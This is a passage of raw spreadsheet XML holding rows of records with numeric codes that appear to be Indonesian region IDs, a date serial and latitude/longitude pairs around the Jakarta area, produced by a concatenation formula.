      <c r="J1574" t="s">
        <v>2627</v>
      </c>
      <c r="L1574" t="s">
        <v>5434</v>
      </c>
      <c r="M1574">
        <v>3275041002</v>
      </c>
      <c r="N1574">
        <v>3275041</v>
      </c>
      <c r="O1574">
        <v>3275</v>
      </c>
      <c r="P1574">
        <v>32</v>
      </c>
      <c r="Q1574" t="s">
        <v>5435</v>
      </c>
      <c r="R1574" t="s">
        <v>134</v>
      </c>
      <c r="S1574" t="s">
        <v>41</v>
      </c>
      <c r="T1574" t="s">
        <v>42</v>
      </c>
      <c r="U1574" s="5">
        <v>10699825</v>
      </c>
      <c r="V1574" s="5" t="s">
        <v>15874</v>
      </c>
      <c r="W1574" s="5">
        <v>-628442</v>
      </c>
      <c r="X1574" t="s">
        <v>19640</v>
      </c>
      <c r="Y1574" t="str">
        <f t="shared" si="24"/>
        <v>-6.28442,106.99825</v>
      </c>
    </row>
    <row r="1575" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1575">
        <v>109100</v>
      </c>
      <c r="B1575" s="1">
        <v>43886</v>
      </c>
      <c r="C1575">
        <v>0</v>
      </c>
      <c r="D1575" t="s">
        <v>22</v>
      </c>
      <c r="E1575" t="s">
        <v>23</v>
      </c>
      <c r="F1575" t="s">
        <v>5436</v>
      </c>
      <c r="G1575" t="s">
        <v>5437</v>
      </c>
      <c r="H1575" t="s">
        <v>26</v>
      </c>
      <c r="I1575" t="s">
        <v>628</v>
      </c>
      <c r="J1575" t="s">
        <v>319</v>
      </c>
      <c r="M1575">
        <v>3173070001</v>
      </c>
      <c r="N1575">
        <v>3173070</v>
      </c>
      <c r="O1575">
        <v>3173</v>
      </c>
      <c r="P1575">
        <v>31</v>
      </c>
      <c r="Q1575" t="s">
        <v>322</v>
      </c>
      <c r="R1575" t="s">
        <v>323</v>
      </c>
      <c r="S1575" t="s">
        <v>62</v>
      </c>
      <c r="T1575" t="s">
        <v>33</v>
      </c>
      <c r="U1575" s="5">
        <v>10683529</v>
      </c>
      <c r="V1575" s="5" t="s">
        <v>15875</v>
      </c>
      <c r="W1575" s="5">
        <v>-616122</v>
      </c>
      <c r="X1575" t="s">
        <v>19641</v>
      </c>
      <c r="Y1575" t="str">
        <f t="shared" si="24"/>
        <v>-6.16122,106.83529</v>
      </c>
    </row>
    <row r="1576" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1576">
        <v>109101</v>
      </c>
      <c r="B1576" s="1">
        <v>43886</v>
      </c>
      <c r="C1576">
        <v>0</v>
      </c>
      <c r="D1576" t="s">
        <v>22</v>
      </c>
      <c r="E1576" t="s">
        <v>23</v>
      </c>
      <c r="F1576" t="s">
        <v>5438</v>
      </c>
      <c r="G1576" t="s">
        <v>5439</v>
      </c>
      <c r="H1576" t="s">
        <v>26</v>
      </c>
      <c r="I1576" t="s">
        <v>5440</v>
      </c>
      <c r="J1576" t="s">
        <v>5441</v>
      </c>
      <c r="L1576" t="s">
        <v>5442</v>
      </c>
      <c r="M1576">
        <v>3173020003</v>
      </c>
      <c r="N1576">
        <v>3173020</v>
      </c>
      <c r="O1576">
        <v>3173</v>
      </c>
      <c r="P1576">
        <v>31</v>
      </c>
      <c r="Q1576" t="s">
        <v>5443</v>
      </c>
      <c r="R1576" t="s">
        <v>179</v>
      </c>
      <c r="S1576" t="s">
        <v>62</v>
      </c>
      <c r="T1576" t="s">
        <v>33</v>
      </c>
      <c r="U1576" s="5">
        <v>10683822</v>
      </c>
      <c r="V1576" s="5" t="s">
        <v>15876</v>
      </c>
      <c r="W1576" s="5">
        <v>-619108</v>
      </c>
      <c r="X1576" t="s">
        <v>19642</v>
      </c>
      <c r="Y1576" t="str">
        <f t="shared" si="24"/>
        <v>-6.19108,106.83822</v>
      </c>
    </row>
    <row r="1577" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1577">
        <v>109102</v>
      </c>
      <c r="B1577" s="1">
        <v>43886</v>
      </c>
      <c r="C1577">
        <v>0</v>
      </c>
      <c r="D1577" t="s">
        <v>22</v>
      </c>
      <c r="E1577" t="s">
        <v>23</v>
      </c>
      <c r="F1577" t="s">
        <v>5444</v>
      </c>
      <c r="G1577" t="s">
        <v>5445</v>
      </c>
      <c r="H1577" t="s">
        <v>26</v>
      </c>
      <c r="I1577" t="s">
        <v>386</v>
      </c>
      <c r="J1577" t="s">
        <v>2194</v>
      </c>
      <c r="L1577" t="s">
        <v>5446</v>
      </c>
      <c r="M1577">
        <v>3175050002</v>
      </c>
      <c r="N1577">
        <v>3175050</v>
      </c>
      <c r="O1577">
        <v>3175</v>
      </c>
      <c r="P1577">
        <v>31</v>
      </c>
      <c r="Q1577" t="s">
        <v>1012</v>
      </c>
      <c r="R1577" t="s">
        <v>1013</v>
      </c>
      <c r="S1577" t="s">
        <v>547</v>
      </c>
      <c r="T1577" t="s">
        <v>33</v>
      </c>
      <c r="U1577" s="5">
        <v>10690399</v>
      </c>
      <c r="V1577" s="5" t="s">
        <v>15877</v>
      </c>
      <c r="W1577" s="5">
        <v>-617401</v>
      </c>
      <c r="X1577" t="s">
        <v>19643</v>
      </c>
      <c r="Y1577" t="str">
        <f t="shared" si="24"/>
        <v>-6.17401,106.90399</v>
      </c>
    </row>
    <row r="1578" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1578">
        <v>109103</v>
      </c>
      <c r="B1578" s="1">
        <v>43886</v>
      </c>
      <c r="C1578">
        <v>0</v>
      </c>
      <c r="D1578" t="s">
        <v>22</v>
      </c>
      <c r="E1578" t="s">
        <v>23</v>
      </c>
      <c r="F1578" t="s">
        <v>5447</v>
      </c>
      <c r="G1578" t="s">
        <v>5448</v>
      </c>
      <c r="H1578" t="s">
        <v>26</v>
      </c>
      <c r="I1578" t="s">
        <v>3603</v>
      </c>
      <c r="J1578" t="s">
        <v>2627</v>
      </c>
      <c r="M1578">
        <v>3275050002</v>
      </c>
      <c r="N1578">
        <v>3275050</v>
      </c>
      <c r="O1578">
        <v>3275</v>
      </c>
      <c r="P1578">
        <v>32</v>
      </c>
      <c r="Q1578" t="s">
        <v>2245</v>
      </c>
      <c r="R1578" t="s">
        <v>955</v>
      </c>
      <c r="S1578" t="s">
        <v>41</v>
      </c>
      <c r="T1578" t="s">
        <v>42</v>
      </c>
      <c r="U1578" s="5">
        <v>10697144</v>
      </c>
      <c r="V1578" s="5" t="s">
        <v>15878</v>
      </c>
      <c r="W1578" s="5">
        <v>-626684</v>
      </c>
      <c r="X1578" t="s">
        <v>19644</v>
      </c>
      <c r="Y1578" t="str">
        <f t="shared" si="24"/>
        <v>-6.26684,106.97144</v>
      </c>
    </row>
    <row r="1579" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1579">
        <v>109104</v>
      </c>
      <c r="B1579" s="1">
        <v>43886</v>
      </c>
      <c r="C1579">
        <v>0</v>
      </c>
      <c r="D1579" t="s">
        <v>22</v>
      </c>
      <c r="E1579" t="s">
        <v>23</v>
      </c>
      <c r="F1579" t="s">
        <v>5449</v>
      </c>
      <c r="G1579" t="s">
        <v>5450</v>
      </c>
      <c r="H1579" t="s">
        <v>26</v>
      </c>
      <c r="I1579" t="s">
        <v>197</v>
      </c>
      <c r="J1579" t="s">
        <v>2194</v>
      </c>
      <c r="L1579" t="s">
        <v>5451</v>
      </c>
      <c r="M1579">
        <v>3175050002</v>
      </c>
      <c r="N1579">
        <v>3175050</v>
      </c>
      <c r="O1579">
        <v>3175</v>
      </c>
      <c r="P1579">
        <v>31</v>
      </c>
      <c r="Q1579" t="s">
        <v>1012</v>
      </c>
      <c r="R1579" t="s">
        <v>1013</v>
      </c>
      <c r="S1579" t="s">
        <v>547</v>
      </c>
      <c r="T1579" t="s">
        <v>33</v>
      </c>
      <c r="U1579" s="5">
        <v>10690318</v>
      </c>
      <c r="V1579" s="5" t="s">
        <v>15879</v>
      </c>
      <c r="W1579" s="5">
        <v>-617344</v>
      </c>
      <c r="X1579" t="s">
        <v>19645</v>
      </c>
      <c r="Y1579" t="str">
        <f t="shared" si="24"/>
        <v>-6.17344,106.90318</v>
      </c>
    </row>
    <row r="1580" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1580">
        <v>109105</v>
      </c>
      <c r="B1580" s="1">
        <v>43886</v>
      </c>
      <c r="C1580">
        <v>0</v>
      </c>
      <c r="D1580" t="s">
        <v>22</v>
      </c>
      <c r="E1580" t="s">
        <v>23</v>
      </c>
      <c r="F1580" t="s">
        <v>5452</v>
      </c>
      <c r="H1580" t="s">
        <v>26</v>
      </c>
      <c r="I1580" t="s">
        <v>555</v>
      </c>
      <c r="J1580" t="s">
        <v>566</v>
      </c>
      <c r="L1580" t="s">
        <v>5453</v>
      </c>
      <c r="M1580">
        <v>3174070004</v>
      </c>
      <c r="N1580">
        <v>3174070</v>
      </c>
      <c r="O1580">
        <v>3174</v>
      </c>
      <c r="P1580">
        <v>31</v>
      </c>
      <c r="Q1580" t="s">
        <v>926</v>
      </c>
      <c r="R1580" t="s">
        <v>84</v>
      </c>
      <c r="S1580" t="s">
        <v>32</v>
      </c>
      <c r="T1580" t="s">
        <v>33</v>
      </c>
      <c r="U1580" s="5">
        <v>10673635</v>
      </c>
      <c r="V1580" s="5" t="s">
        <v>15880</v>
      </c>
      <c r="W1580" s="5">
        <v>-613045</v>
      </c>
      <c r="X1580" t="s">
        <v>18386</v>
      </c>
      <c r="Y1580" t="str">
        <f t="shared" si="24"/>
        <v>-6.13045,106.73635</v>
      </c>
    </row>
    <row r="1581" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1581">
        <v>109106</v>
      </c>
      <c r="B1581" s="1">
        <v>43886</v>
      </c>
      <c r="C1581">
        <v>0</v>
      </c>
      <c r="D1581" t="s">
        <v>22</v>
      </c>
      <c r="E1581" t="s">
        <v>23</v>
      </c>
      <c r="F1581" t="s">
        <v>5454</v>
      </c>
      <c r="H1581" t="s">
        <v>26</v>
      </c>
      <c r="I1581" t="s">
        <v>1683</v>
      </c>
      <c r="J1581" t="s">
        <v>2627</v>
      </c>
      <c r="L1581" t="s">
        <v>5455</v>
      </c>
      <c r="M1581">
        <v>3216061010</v>
      </c>
      <c r="N1581">
        <v>3216061</v>
      </c>
      <c r="O1581">
        <v>3216</v>
      </c>
      <c r="P1581">
        <v>32</v>
      </c>
      <c r="Q1581" t="s">
        <v>3983</v>
      </c>
      <c r="R1581" t="s">
        <v>55</v>
      </c>
      <c r="S1581" t="s">
        <v>41</v>
      </c>
      <c r="T1581" t="s">
        <v>42</v>
      </c>
      <c r="U1581" s="5">
        <v>10716624</v>
      </c>
      <c r="V1581" s="5" t="s">
        <v>15881</v>
      </c>
      <c r="W1581" s="5">
        <v>-625016</v>
      </c>
      <c r="X1581" t="s">
        <v>19646</v>
      </c>
      <c r="Y1581" t="str">
        <f t="shared" si="24"/>
        <v>-6.25016,107.16624</v>
      </c>
    </row>
    <row r="1582" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1582">
        <v>109107</v>
      </c>
      <c r="B1582" s="1">
        <v>43886</v>
      </c>
      <c r="C1582">
        <v>0</v>
      </c>
      <c r="D1582" t="s">
        <v>22</v>
      </c>
      <c r="E1582" t="s">
        <v>23</v>
      </c>
      <c r="F1582" t="s">
        <v>5456</v>
      </c>
      <c r="H1582" t="s">
        <v>26</v>
      </c>
      <c r="I1582" t="s">
        <v>5457</v>
      </c>
      <c r="J1582" t="s">
        <v>2627</v>
      </c>
      <c r="L1582" t="s">
        <v>5458</v>
      </c>
      <c r="M1582">
        <v>3275060001</v>
      </c>
      <c r="N1582">
        <v>3275060</v>
      </c>
      <c r="O1582">
        <v>3275</v>
      </c>
      <c r="P1582">
        <v>32</v>
      </c>
      <c r="Q1582" t="s">
        <v>611</v>
      </c>
      <c r="R1582" t="s">
        <v>114</v>
      </c>
      <c r="S1582" t="s">
        <v>41</v>
      </c>
      <c r="T1582" t="s">
        <v>42</v>
      </c>
      <c r="U1582" s="5">
        <v>10695428</v>
      </c>
      <c r="V1582" s="5" t="s">
        <v>15882</v>
      </c>
      <c r="W1582" s="5">
        <v>-623114</v>
      </c>
      <c r="X1582" t="s">
        <v>19647</v>
      </c>
      <c r="Y1582" t="str">
        <f t="shared" si="24"/>
        <v>-6.23114,106.95428</v>
      </c>
    </row>
    <row r="1583" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1583">
        <v>109108</v>
      </c>
      <c r="B1583" s="1">
        <v>43886</v>
      </c>
      <c r="C1583">
        <v>0</v>
      </c>
      <c r="D1583" t="s">
        <v>22</v>
      </c>
      <c r="E1583" t="s">
        <v>23</v>
      </c>
      <c r="F1583" t="s">
        <v>5459</v>
      </c>
      <c r="G1583" t="s">
        <v>5460</v>
      </c>
      <c r="H1583" t="s">
        <v>26</v>
      </c>
      <c r="I1583" t="s">
        <v>290</v>
      </c>
      <c r="J1583" t="s">
        <v>5461</v>
      </c>
      <c r="L1583" t="s">
        <v>5462</v>
      </c>
      <c r="M1583">
        <v>3173070005</v>
      </c>
      <c r="N1583">
        <v>3173070</v>
      </c>
      <c r="O1583">
        <v>3173</v>
      </c>
      <c r="P1583">
        <v>31</v>
      </c>
      <c r="Q1583" t="s">
        <v>1578</v>
      </c>
      <c r="R1583" t="s">
        <v>323</v>
      </c>
      <c r="S1583" t="s">
        <v>62</v>
      </c>
      <c r="T1583" t="s">
        <v>33</v>
      </c>
      <c r="U1583" s="5">
        <v>10682844</v>
      </c>
      <c r="V1583" s="5" t="s">
        <v>15883</v>
      </c>
      <c r="W1583" s="5">
        <v>-613592</v>
      </c>
      <c r="X1583" t="s">
        <v>19648</v>
      </c>
      <c r="Y1583" t="str">
        <f t="shared" si="24"/>
        <v>-6.13592,106.82844</v>
      </c>
    </row>
    <row r="1584" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1584">
        <v>109109</v>
      </c>
      <c r="B1584" s="1">
        <v>43886</v>
      </c>
      <c r="C1584">
        <v>0</v>
      </c>
      <c r="D1584" t="s">
        <v>22</v>
      </c>
      <c r="E1584" t="s">
        <v>23</v>
      </c>
      <c r="F1584" t="s">
        <v>5463</v>
      </c>
      <c r="G1584" t="s">
        <v>5464</v>
      </c>
      <c r="H1584" t="s">
        <v>26</v>
      </c>
      <c r="I1584" t="s">
        <v>1051</v>
      </c>
      <c r="J1584" t="s">
        <v>3693</v>
      </c>
      <c r="M1584">
        <v>3175050003</v>
      </c>
      <c r="N1584">
        <v>3175050</v>
      </c>
      <c r="O1584">
        <v>3175</v>
      </c>
      <c r="P1584">
        <v>31</v>
      </c>
      <c r="Q1584" t="s">
        <v>1740</v>
      </c>
      <c r="R1584" t="s">
        <v>1013</v>
      </c>
      <c r="S1584" t="s">
        <v>547</v>
      </c>
      <c r="T1584" t="s">
        <v>33</v>
      </c>
      <c r="U1584" s="5">
        <v>10691316</v>
      </c>
      <c r="V1584" s="5" t="s">
        <v>15884</v>
      </c>
      <c r="W1584" s="5">
        <v>-616784</v>
      </c>
      <c r="X1584" t="s">
        <v>19649</v>
      </c>
      <c r="Y1584" t="str">
        <f t="shared" si="24"/>
        <v>-6.16784,106.91316</v>
      </c>
    </row>
    <row r="1585" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1585">
        <v>109110</v>
      </c>
      <c r="B1585" s="1">
        <v>43886</v>
      </c>
      <c r="C1585">
        <v>0</v>
      </c>
      <c r="D1585" t="s">
        <v>22</v>
      </c>
      <c r="E1585" t="s">
        <v>23</v>
      </c>
      <c r="F1585" t="s">
        <v>5465</v>
      </c>
      <c r="G1585" t="s">
        <v>5466</v>
      </c>
      <c r="H1585" t="s">
        <v>26</v>
      </c>
      <c r="I1585" t="s">
        <v>1005</v>
      </c>
      <c r="J1585" t="s">
        <v>5467</v>
      </c>
      <c r="L1585" t="s">
        <v>5468</v>
      </c>
      <c r="M1585">
        <v>3172080003</v>
      </c>
      <c r="N1585">
        <v>3172080</v>
      </c>
      <c r="O1585">
        <v>3172</v>
      </c>
      <c r="P1585">
        <v>31</v>
      </c>
      <c r="Q1585" t="s">
        <v>2250</v>
      </c>
      <c r="R1585" t="s">
        <v>141</v>
      </c>
      <c r="S1585" t="s">
        <v>49</v>
      </c>
      <c r="T1585" t="s">
        <v>33</v>
      </c>
      <c r="U1585" s="5">
        <v>10694612</v>
      </c>
      <c r="V1585" s="5" t="s">
        <v>15885</v>
      </c>
      <c r="W1585" s="5">
        <v>-620375</v>
      </c>
      <c r="X1585" t="s">
        <v>19650</v>
      </c>
      <c r="Y1585" t="str">
        <f t="shared" si="24"/>
        <v>-6.20375,106.94612</v>
      </c>
    </row>
    <row r="1586" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1586">
        <v>109111</v>
      </c>
      <c r="B1586" s="1">
        <v>43886</v>
      </c>
      <c r="C1586">
        <v>0</v>
      </c>
      <c r="D1586" t="s">
        <v>22</v>
      </c>
      <c r="E1586" t="s">
        <v>23</v>
      </c>
      <c r="F1586" t="s">
        <v>5469</v>
      </c>
      <c r="G1586" t="s">
        <v>5470</v>
      </c>
      <c r="H1586" t="s">
        <v>26</v>
      </c>
      <c r="I1586" t="s">
        <v>2139</v>
      </c>
      <c r="J1586" t="s">
        <v>2627</v>
      </c>
      <c r="L1586" t="s">
        <v>5471</v>
      </c>
      <c r="M1586">
        <v>3275040006</v>
      </c>
      <c r="N1586">
        <v>3275040</v>
      </c>
      <c r="O1586">
        <v>3275</v>
      </c>
      <c r="P1586">
        <v>32</v>
      </c>
      <c r="Q1586" t="s">
        <v>2185</v>
      </c>
      <c r="R1586" t="s">
        <v>100</v>
      </c>
      <c r="S1586" t="s">
        <v>41</v>
      </c>
      <c r="T1586" t="s">
        <v>42</v>
      </c>
      <c r="U1586" s="5">
        <v>10701069</v>
      </c>
      <c r="V1586" s="5" t="s">
        <v>15886</v>
      </c>
      <c r="W1586" s="5">
        <v>-623561</v>
      </c>
      <c r="X1586" t="s">
        <v>19651</v>
      </c>
      <c r="Y1586" t="str">
        <f t="shared" si="24"/>
        <v>-6.23561,107.01069</v>
      </c>
    </row>
    <row r="1587" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1587">
        <v>109112</v>
      </c>
      <c r="B1587" s="1">
        <v>43886</v>
      </c>
      <c r="C1587">
        <v>0</v>
      </c>
      <c r="D1587" t="s">
        <v>22</v>
      </c>
      <c r="E1587" t="s">
        <v>23</v>
      </c>
      <c r="F1587" t="s">
        <v>5472</v>
      </c>
      <c r="G1587" t="s">
        <v>5473</v>
      </c>
      <c r="H1587" t="s">
        <v>26</v>
      </c>
      <c r="I1587" t="s">
        <v>886</v>
      </c>
      <c r="J1587" t="s">
        <v>2627</v>
      </c>
      <c r="L1587" t="s">
        <v>5474</v>
      </c>
      <c r="M1587">
        <v>3275040007</v>
      </c>
      <c r="N1587">
        <v>3275040</v>
      </c>
      <c r="O1587">
        <v>3275</v>
      </c>
      <c r="P1587">
        <v>32</v>
      </c>
      <c r="Q1587" t="s">
        <v>99</v>
      </c>
      <c r="R1587" t="s">
        <v>100</v>
      </c>
      <c r="S1587" t="s">
        <v>41</v>
      </c>
      <c r="T1587" t="s">
        <v>42</v>
      </c>
      <c r="U1587" s="5">
        <v>10702681</v>
      </c>
      <c r="V1587" s="5" t="s">
        <v>15887</v>
      </c>
      <c r="W1587" s="5">
        <v>-624112</v>
      </c>
      <c r="X1587" t="s">
        <v>18920</v>
      </c>
      <c r="Y1587" t="str">
        <f t="shared" si="24"/>
        <v>-6.24112,107.02681</v>
      </c>
    </row>
    <row r="1588" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1588">
        <v>109113</v>
      </c>
      <c r="B1588" s="1">
        <v>43886</v>
      </c>
      <c r="C1588">
        <v>0</v>
      </c>
      <c r="D1588" t="s">
        <v>22</v>
      </c>
      <c r="E1588" t="s">
        <v>23</v>
      </c>
      <c r="F1588" t="s">
        <v>5475</v>
      </c>
      <c r="G1588" t="s">
        <v>5476</v>
      </c>
      <c r="H1588" t="s">
        <v>26</v>
      </c>
      <c r="I1588" t="s">
        <v>473</v>
      </c>
      <c r="J1588" t="s">
        <v>2627</v>
      </c>
      <c r="L1588" t="s">
        <v>5477</v>
      </c>
      <c r="M1588">
        <v>3216070014</v>
      </c>
      <c r="N1588">
        <v>3216070</v>
      </c>
      <c r="O1588">
        <v>3216</v>
      </c>
      <c r="P1588">
        <v>32</v>
      </c>
      <c r="Q1588" t="s">
        <v>5478</v>
      </c>
      <c r="R1588" t="s">
        <v>5479</v>
      </c>
      <c r="S1588" t="s">
        <v>41</v>
      </c>
      <c r="T1588" t="s">
        <v>42</v>
      </c>
      <c r="U1588" s="5">
        <v>10709521</v>
      </c>
      <c r="V1588" s="5" t="s">
        <v>15888</v>
      </c>
      <c r="W1588" s="5">
        <v>-625242</v>
      </c>
      <c r="X1588" t="s">
        <v>19652</v>
      </c>
      <c r="Y1588" t="str">
        <f t="shared" si="24"/>
        <v>-6.25242,107.09521</v>
      </c>
    </row>
    <row r="1589" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1589">
        <v>109114</v>
      </c>
      <c r="B1589" s="1">
        <v>43886</v>
      </c>
      <c r="C1589">
        <v>0</v>
      </c>
      <c r="D1589" t="s">
        <v>22</v>
      </c>
      <c r="E1589" t="s">
        <v>23</v>
      </c>
      <c r="F1589" t="s">
        <v>5480</v>
      </c>
      <c r="G1589" t="s">
        <v>5481</v>
      </c>
      <c r="H1589" t="s">
        <v>26</v>
      </c>
      <c r="I1589" t="s">
        <v>166</v>
      </c>
      <c r="J1589" t="s">
        <v>5482</v>
      </c>
      <c r="L1589" t="s">
        <v>5483</v>
      </c>
      <c r="M1589">
        <v>3173080004</v>
      </c>
      <c r="N1589">
        <v>3173080</v>
      </c>
      <c r="O1589">
        <v>3173</v>
      </c>
      <c r="P1589">
        <v>31</v>
      </c>
      <c r="Q1589" t="s">
        <v>4745</v>
      </c>
      <c r="R1589" t="s">
        <v>157</v>
      </c>
      <c r="S1589" t="s">
        <v>62</v>
      </c>
      <c r="T1589" t="s">
        <v>33</v>
      </c>
      <c r="U1589" s="5">
        <v>10682276</v>
      </c>
      <c r="V1589" s="5" t="s">
        <v>15889</v>
      </c>
      <c r="W1589" s="5">
        <v>-616437</v>
      </c>
      <c r="X1589" t="s">
        <v>19653</v>
      </c>
      <c r="Y1589" t="str">
        <f t="shared" si="24"/>
        <v>-6.16437,106.82276</v>
      </c>
    </row>
    <row r="1590" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1590">
        <v>109115</v>
      </c>
      <c r="B1590" s="1">
        <v>43886</v>
      </c>
      <c r="C1590">
        <v>0</v>
      </c>
      <c r="D1590" t="s">
        <v>22</v>
      </c>
      <c r="E1590" t="s">
        <v>23</v>
      </c>
      <c r="F1590" t="s">
        <v>5484</v>
      </c>
      <c r="H1590" t="s">
        <v>26</v>
      </c>
      <c r="I1590" t="s">
        <v>166</v>
      </c>
      <c r="J1590" t="s">
        <v>3135</v>
      </c>
      <c r="L1590" t="s">
        <v>5485</v>
      </c>
      <c r="M1590">
        <v>3671012004</v>
      </c>
      <c r="N1590">
        <v>3671012</v>
      </c>
      <c r="O1590">
        <v>3671</v>
      </c>
      <c r="P1590">
        <v>36</v>
      </c>
      <c r="Q1590" t="s">
        <v>5486</v>
      </c>
      <c r="R1590" t="s">
        <v>760</v>
      </c>
      <c r="S1590" t="s">
        <v>201</v>
      </c>
      <c r="T1590" t="s">
        <v>171</v>
      </c>
      <c r="U1590" s="5">
        <v>10671724</v>
      </c>
      <c r="V1590" s="5" t="s">
        <v>15890</v>
      </c>
      <c r="W1590" s="5">
        <v>-621054</v>
      </c>
      <c r="X1590" t="s">
        <v>19654</v>
      </c>
      <c r="Y1590" t="str">
        <f t="shared" si="24"/>
        <v>-6.21054,106.71724</v>
      </c>
    </row>
    <row r="1591" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1591">
        <v>109116</v>
      </c>
      <c r="B1591" s="1">
        <v>43886</v>
      </c>
      <c r="C1591">
        <v>0</v>
      </c>
      <c r="D1591" t="s">
        <v>22</v>
      </c>
      <c r="E1591" t="s">
        <v>23</v>
      </c>
      <c r="F1591" t="s">
        <v>5487</v>
      </c>
      <c r="G1591" t="s">
        <v>5488</v>
      </c>
      <c r="H1591" t="s">
        <v>26</v>
      </c>
      <c r="I1591" t="s">
        <v>1394</v>
      </c>
      <c r="J1591" t="s">
        <v>2627</v>
      </c>
      <c r="L1591" t="s">
        <v>5489</v>
      </c>
      <c r="M1591">
        <v>3275060003</v>
      </c>
      <c r="N1591">
        <v>3275060</v>
      </c>
      <c r="O1591">
        <v>3275</v>
      </c>
      <c r="P1591">
        <v>32</v>
      </c>
      <c r="Q1591" t="s">
        <v>146</v>
      </c>
      <c r="R1591" t="s">
        <v>114</v>
      </c>
      <c r="S1591" t="s">
        <v>41</v>
      </c>
      <c r="T1591" t="s">
        <v>42</v>
      </c>
      <c r="U1591" s="5">
        <v>10697027</v>
      </c>
      <c r="V1591" s="5" t="s">
        <v>15891</v>
      </c>
      <c r="W1591" s="5">
        <v>-622979</v>
      </c>
      <c r="X1591" t="s">
        <v>19655</v>
      </c>
      <c r="Y1591" t="str">
        <f t="shared" si="24"/>
        <v>-6.22979,106.97027</v>
      </c>
    </row>
    <row r="1592" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1592">
        <v>109117</v>
      </c>
      <c r="B1592" s="1">
        <v>43886</v>
      </c>
      <c r="C1592">
        <v>0</v>
      </c>
      <c r="D1592" t="s">
        <v>22</v>
      </c>
      <c r="E1592" t="s">
        <v>23</v>
      </c>
      <c r="F1592" t="s">
        <v>5490</v>
      </c>
      <c r="G1592" t="s">
        <v>5491</v>
      </c>
      <c r="H1592" t="s">
        <v>26</v>
      </c>
      <c r="I1592" t="s">
        <v>5492</v>
      </c>
      <c r="J1592" t="s">
        <v>5493</v>
      </c>
      <c r="M1592">
        <v>3171090004</v>
      </c>
      <c r="N1592">
        <v>3171090</v>
      </c>
      <c r="O1592">
        <v>3171</v>
      </c>
      <c r="P1592">
        <v>31</v>
      </c>
      <c r="Q1592" t="s">
        <v>1074</v>
      </c>
      <c r="R1592" t="s">
        <v>347</v>
      </c>
      <c r="S1592" t="s">
        <v>108</v>
      </c>
      <c r="T1592" t="s">
        <v>33</v>
      </c>
      <c r="U1592" s="5">
        <v>10686374</v>
      </c>
      <c r="V1592" s="5" t="s">
        <v>15892</v>
      </c>
      <c r="W1592" s="5">
        <v>-622621</v>
      </c>
      <c r="X1592" t="s">
        <v>19656</v>
      </c>
      <c r="Y1592" t="str">
        <f t="shared" si="24"/>
        <v>-6.22621,106.86374</v>
      </c>
    </row>
    <row r="1593" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1593">
        <v>109118</v>
      </c>
      <c r="B1593" s="1">
        <v>43886</v>
      </c>
      <c r="C1593">
        <v>0</v>
      </c>
      <c r="D1593" t="s">
        <v>22</v>
      </c>
      <c r="E1593" t="s">
        <v>23</v>
      </c>
      <c r="F1593" t="s">
        <v>5494</v>
      </c>
      <c r="G1593" t="s">
        <v>5495</v>
      </c>
      <c r="H1593" t="s">
        <v>26</v>
      </c>
      <c r="I1593" t="s">
        <v>5188</v>
      </c>
      <c r="J1593" t="s">
        <v>5496</v>
      </c>
      <c r="L1593" t="s">
        <v>5497</v>
      </c>
      <c r="M1593">
        <v>3172080003</v>
      </c>
      <c r="N1593">
        <v>3172080</v>
      </c>
      <c r="O1593">
        <v>3172</v>
      </c>
      <c r="P1593">
        <v>31</v>
      </c>
      <c r="Q1593" t="s">
        <v>2250</v>
      </c>
      <c r="R1593" t="s">
        <v>141</v>
      </c>
      <c r="S1593" t="s">
        <v>49</v>
      </c>
      <c r="T1593" t="s">
        <v>33</v>
      </c>
      <c r="U1593" s="5">
        <v>10694772</v>
      </c>
      <c r="V1593" s="5" t="s">
        <v>15893</v>
      </c>
      <c r="W1593" s="5">
        <v>-620778</v>
      </c>
      <c r="X1593" t="s">
        <v>19657</v>
      </c>
      <c r="Y1593" t="str">
        <f t="shared" si="24"/>
        <v>-6.20778,106.94772</v>
      </c>
    </row>
    <row r="1594" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1594">
        <v>109119</v>
      </c>
      <c r="B1594" s="1">
        <v>43886</v>
      </c>
      <c r="C1594">
        <v>0</v>
      </c>
      <c r="D1594" t="s">
        <v>22</v>
      </c>
      <c r="E1594" t="s">
        <v>23</v>
      </c>
      <c r="F1594" t="s">
        <v>5498</v>
      </c>
      <c r="G1594" t="s">
        <v>5499</v>
      </c>
      <c r="H1594" t="s">
        <v>26</v>
      </c>
      <c r="I1594" t="s">
        <v>2962</v>
      </c>
      <c r="J1594" t="s">
        <v>5500</v>
      </c>
      <c r="L1594" t="s">
        <v>5501</v>
      </c>
      <c r="M1594">
        <v>3172070007</v>
      </c>
      <c r="N1594">
        <v>3172070</v>
      </c>
      <c r="O1594">
        <v>3172</v>
      </c>
      <c r="P1594">
        <v>31</v>
      </c>
      <c r="Q1594" t="s">
        <v>3186</v>
      </c>
      <c r="R1594" t="s">
        <v>128</v>
      </c>
      <c r="S1594" t="s">
        <v>49</v>
      </c>
      <c r="T1594" t="s">
        <v>33</v>
      </c>
      <c r="U1594" s="5">
        <v>10690322</v>
      </c>
      <c r="V1594" s="5" t="s">
        <v>14935</v>
      </c>
      <c r="W1594" s="5">
        <v>-621966</v>
      </c>
      <c r="X1594" t="s">
        <v>18583</v>
      </c>
      <c r="Y1594" t="str">
        <f t="shared" si="24"/>
        <v>-6.21966,106.90322</v>
      </c>
    </row>
    <row r="1595" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1595">
        <v>109120</v>
      </c>
      <c r="B1595" s="1">
        <v>43886</v>
      </c>
      <c r="C1595">
        <v>0</v>
      </c>
